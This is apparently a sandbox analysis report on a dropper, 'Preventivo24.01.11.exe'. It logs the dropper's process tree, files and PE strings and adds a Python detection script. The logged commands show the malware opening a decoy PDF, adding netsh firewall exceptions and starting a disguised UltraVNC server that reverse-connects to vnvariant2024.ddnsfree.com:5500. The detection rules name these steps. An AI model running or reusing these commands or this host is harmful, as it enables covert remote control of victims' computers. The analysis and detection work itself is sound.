Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI="
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
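The process-creation listing above reads as one chain once the noise is stripped out: cmd.exe opens a decoy PDF from %TEMP% in Acrobat, punches a firewall hole for C:\Games\taskhost.exe with the legacy "netsh firewall add allowedprogram" context, checks with wmic/findstr whether taskhost.exe is already running, and finally starts C:\Games\taskhost.exe (whose PDB path below identifies it as the UltraVNC winvnc server) with "-autoreconnect ... -connect vnvariant2024.ddnsfree.com:5500", i.e. a reverse connection to a listening viewer. The Python below is an added triage example written for this page, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses lines in the report's own "Source: <parent> Process created: <image> <command line>" format and applies five rules that catch exactly those steps. The rule names, the trusted-root list, the set of Windows binary names that only live under System32/SysWOW64 and the reader-process set are my assumptions; the five sample lines are copied from the listing above.

```python
"""Triage rules over 'Process created' lines in the format this report uses."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "rule image detail")

# Five lines copied from the process-creation listing above; a real run would take the whole tree.
SAMPLE_LINES = [
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2',
]

# Report line layout: parent image, literal marker, child image (path may contain spaces), command line.
LINE_RE = re.compile(
    r'^Source: (?P<parent>.+?\.(?:exe|com)) Process created: '
    r'(?P<image>.+?\.(?:exe|com))\s*(?P<cmdline>.*)$', re.IGNORECASE)
# Both the legacy 'netsh firewall' context used by this sample and the current 'advfirewall' syntax.
FIREWALL_RE = re.compile(
    r'netsh\s+(?:advfirewall\s+firewall\s+add\s+rule|firewall\s+add\s+allowedprogram)\b'
    r'.*?program="?(?P<program>[^"\s]+)', re.IGNORECASE)
# UltraVNC-style reverse connection: the server dials out to a listening viewer at host:port.
VNC_RE = re.compile(r'-connect\s+(?P<target>[\w.\-]+:\d{1,5})\b', re.IGNORECASE)

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
TRUSTED_ROOTS = SYSTEM_DIRS + (r"c:\program files", r"c:\program files (x86)")
# Assumed list: genuine Windows binaries with these names only live under System32/SysWOW64.
SYSTEM_NAMES = {"taskhost.exe", "taskhostw.exe", "svchost.exe", "csrss.exe", "lsass.exe", "dllhost.exe"}
# Assumed list: document viewers a lure would open a decoy in.
READERS = {"acrobat.exe", "acrord32.exe", "winword.exe", "excel.exe"}


def _under(path, roots):
    """True if 'path' is one of 'roots' or lies beneath one (case-insensitive)."""
    p = path.lower().rstrip("\\")
    return any(p == r or p.startswith(r + "\\") for r in roots)


def _split(path):
    """Lower-cased (directory, basename) of a Windows path."""
    d, _, b = path.rpartition("\\")
    return d.lower(), b.lower()


def triage(line):
    """Return the findings one report line triggers (empty list for lines that match no rule)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    image, cmd = m["image"], m["cmdline"]
    d, b = _split(image)
    out = []
    fw = FIREWALL_RE.search(cmd)
    if fw and not _under(fw["program"], TRUSTED_ROOTS):
        out.append(Finding("firewall_exception_untrusted_path", image, fw["program"]))
    if b in SYSTEM_NAMES and not _under(d, SYSTEM_DIRS):
        out.append(Finding("system_name_outside_system_dir", image, d))
    vnc = VNC_RE.search(cmd)
    if vnc:
        out.append(Finding("vnc_reverse_connect", image, vnc["target"]))
    if b == "wmic.exe" and re.search(r"\bprocess\b.*\bget\b", cmd, re.IGNORECASE):
        out.append(Finding("process_discovery_wmic", image, cmd.strip()))
    if b in READERS and "\\appdata\\local\\temp\\" in cmd.lower():
        out.append(Finding("decoy_document_from_temp", image, cmd.strip()))
    return out


def triage_all(lines):
    """Flatten the findings for a whole listing, in report order."""
    return [f for line in lines for f in triage(line)]


if __name__ == "__main__":
    for f in triage_all(SAMPLE_LINES):
        print(f"{f.rule:34} {f.image}  ->  {f.detail}")
```

Run against the five sample lines the rules fire once each for the firewall exception, the WMIC process query and the decoy PDF, and twice for the taskhost.exe launch (wrong directory for that name, plus the reverse-connect target); the timeout line produces nothing. The same five predicates translate directly into process-creation (Sysmon event 1 / Security 4688) detections, where the parent/child/command-line fields are the same three pieces of information the report lines carry.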
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini
Source: C:\Games\taskhost.exe File opened: C:\Windows\SysWOW64\RICHED32.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Preventivo24.01.11.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Preventivo24.01.11.exe Static file information: File size 5955744 > 1048576
Source: Preventivo24.01.11.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Preventivo24.01.11.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI54C4.tmp.0.dr, MSI5406.tmp.0.dr, MSI54A3.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: shi5398.tmp.0.dr Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
